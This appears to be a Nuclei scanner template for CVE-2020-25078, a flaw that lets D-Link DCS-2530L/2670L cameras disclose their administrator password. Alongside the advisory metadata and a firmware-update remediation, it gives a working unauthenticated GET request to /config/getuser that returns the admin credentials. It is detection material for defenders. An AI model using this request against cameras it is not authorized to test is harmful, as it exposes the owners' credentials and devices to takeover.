id: CVE-2020-25078 info: name: D-Link DCS-2530L/DCS-2670L - Administrator Password Disclosure author: pikpikcu severity: high description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the /config/getuser endpoint allows for remote administrator password disclosure. remediation: | Update the camera firmware to the latest version to fix the vulnerability. reference: - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180 - https://twitter.com/Dogonsecurity/status/1273251236167516161 - https://nvd.nist.gov/vuln/detail/CVE-2020-25078 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-25078 epss-score: 0.96829 epss-percentile: 0.99574 cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dlink product: dcs-2530l_firmware tags: cve,cve2020,dlink http: - method: GET path: - "{{BaseURL}}/config/getuser?index=0" matchers-condition: and matchers: - type: word words: - "name=" - "pass=" condition: and - type: word part: header words: - "text/plain" - type: status status: - 200 # digest: 490a00463044022046f6313d6b5c745450e6f970dfcb162fc7cb3521e8c41c215fbfca69196ec60202206ca2cff410c5be8f8e40b80aaf54b666dcf96ebe807b23835e1a36c54f3755c9:922c64590222798bb761d5b6d8e72950